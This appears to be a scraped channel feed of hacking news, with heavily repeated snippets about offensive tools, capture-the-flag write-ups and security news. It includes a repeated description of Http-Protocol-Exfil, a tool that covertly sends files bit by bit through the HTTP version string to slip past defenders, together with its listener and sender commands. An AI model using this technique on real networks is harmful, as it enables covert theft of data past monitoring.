Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Offensive Security Tool: ZipExec https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Offensive Security Tool: ZipExecPost Views: 16 https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/BECOME…
ethicalhacking.com/wp-content/uploads/2021/08/0URVvVK54SOsx1MEq-90x90.png Offensive Security Tool: FFUF2 months ago
The post Offensive Security Tool: ZipExec first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
The post Offensive Security Tool: ZipExec first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Root Me — TryHackMe
Welcome back amazing hackers in this blog I came with another interesting topic RootMe walkthrough which is based on file upload and…Continue reading on Medium »
Read more...
Welcome back amazing hackers in this blog I came with another interesting topic RootMe walkthrough which is based on file upload and…Continue reading on Medium »
Read more...
Root Me — TryHackMe
https://mukibas37.medium.com/root-me-tryhackme-36bcfe49fd22?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://mukibas37.medium.com/root-me-tryhackme-36bcfe49fd22?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Root Me — TryHackMe
Welcome back amazing hackers in this blog I came with another interesting topic RootMe walkthrough which is based on file upload and…
Welcome back amazing hackers in this blog I came with another interesting topic RootMe walkthrough which is based on file upload and…Continue reading on Medium » (https://mukibas37.medium.com/root-me-tryhackme-36bcfe49fd22?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Root Me — TryHackMe
Welcome back amazing hackers in this blog I came with another interesting topic RootMe walkthrough which is based on file upload and…
Http-Protocol-Exfil - Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)
Use the HTTP protocol version to send a file bit by bit ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).Create listenerTo run the listener use listener.py with one optional argument: the port it will be listening in.python3 listener.py PORTExample:python3 listener.py 8080Send a fileTo send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).python3 sender.py -u URL -i INPUTFILE -o OUTPUTFILEExample:python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txtExampleFirst the file is sent:If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:The new file is created with the content of the input file:MotivationI think (I am not sure) I read someone on Twitter who claimed to have used this to exfiltrate data and I liked the idea, if you are that person let me know.Download Http-Protocol-Exfil
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Use the HTTP protocol version to send a file bit by bit ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).Create listenerTo run the listener use listener.py with one optional argument: the port it will be listening in.python3 listener.py PORTExample:python3 listener.py 8080Send a fileTo send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).python3 sender.py -u URL -i INPUTFILE -o OUTPUTFILEExample:python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txtExampleFirst the file is sent:If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:The new file is created with the content of the input file:MotivationI think (I am not sure) I read someone on Twitter who claimed to have used this to exfiltrate data and I liked the idea, if you are that person let me know.Download Http-Protocol-Exfil
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
A cyberattack paralyzed every gas station in Iran
https://external-preview.redd.it/7Z_K12rR3Sq0KZFWcPwkXAghnDl6iEZ7anXN1Gm5Pk0.jpg?width=640&crop=smart&auto=webp&s=6e3bf02fbc59de404e205e46302824088e84b275 submitted by /u/eis3nheim
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
A cyberattack paralyzed every gas station in Iran
https://external-preview.redd.it/7Z_K12rR3Sq0KZFWcPwkXAghnDl6iEZ7anXN1Gm5Pk0.jpg?width=640&crop=smart&auto=webp&s=6e3bf02fbc59de404e205e46302824088e84b275 submitted by /u/eis3nheim
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
A cyberattack paralyzed every gas station in Iran
Posted in r/hacking by u/eis3nheim • 368 points and 42 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackTheBox | Vaccine
https://cdn-images-1.medium.com/max/1280/0*g6XeDE6S9oeiv_Fr.jpg
If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackTheBox | Vaccine
https://cdn-images-1.medium.com/max/1280/0*g6XeDE6S9oeiv_Fr.jpg
If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackTheBox | Vaccine
If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!.
Http-Protocol-Exfil - Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)
http://www.kitploit.com/2021/10/http-protocol-exfil-exfiltrate-files.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/10/http-protocol-exfil-exfiltrate-files.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Use the HTTP protocol version to send a file bit by bit ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1). It uses GET requests so the Blue Team (https://www.kitploit.com/search/label/Blue%20Team) would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).
Create listener
To run the listener (https://www.kitploit.com/search/label/Listener) use listener.py with one optional argument: the port it will be listening in.python3 listener.py [PORT]
Example:python3 listener.py 8080
Send a file
To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]
Example:python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt
Example
First the file is sent:
___________________________
@hacking_Attack
@Hacking_Video
Create listener
To run the listener (https://www.kitploit.com/search/label/Listener) use listener.py with one optional argument: the port it will be listening in.python3 listener.py [PORT]
Example:python3 listener.py 8080
Send a file
To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]
Example:python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt
Example
First the file is sent:
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
If the variable debug is set to True (it is by default) you can see the binary (https://www.kitploit.com/search/label/Binary) values in the listener log messages:
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
The new file is created with the content of the input file:
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest Tools!
Http-Protocol-Exfil - Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)
___________________________
@hacking_Attack
@Hacking_Video
Http-Protocol-Exfil - Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Finding the Right Approach to Cloud Security Posture Management (CSPM)
Cloud security is maturing — it has to. New strategies are surfacing to respond to new problems. Dr. Mike Lloyd, RedSeal's CTO, reviews one of the latest: CSPM.
___________________________
@hacking_Attack
@Hacking_Video
Finding the Right Approach to Cloud Security Posture Management (CSPM)
Cloud security is maturing — it has to. New strategies are surfacing to respond to new problems. Dr. Mike Lloyd, RedSeal's CTO, reviews one of the latest: CSPM.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Finding the Right Approach to Cloud Security Posture Management (CSPM)
Cloud security is maturing — it has to. New strategies are surfacing to respond to new problems. Dr. Mike Lloyd, RedSeal's CTO, reviews one of the latest: CSPM.